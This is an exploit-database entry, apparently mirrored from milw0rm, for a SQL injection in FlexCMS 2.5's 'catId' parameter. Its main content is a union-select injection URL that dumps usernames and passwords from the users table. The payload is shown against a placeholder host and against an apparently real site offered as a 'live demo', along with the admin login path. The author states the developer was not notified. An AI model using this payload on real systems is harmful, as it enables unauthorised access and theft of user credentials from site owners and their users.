[] NeoSense
E X P L O I T S
title author type platform port cve id

FlexCMS 2.5 - 'catId' SQL Injection

Author: MisterRichard
type: webapps
platform: php
port: 
date_added: 2009-02-08 
date_updated: 2017-02-08 
verified: 1 
codes: OSVDB-51992;CVE-2009-1256;CVE-2009-0534 
tags: 
aliases:  
screenshot_url:  
application_url: 
AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.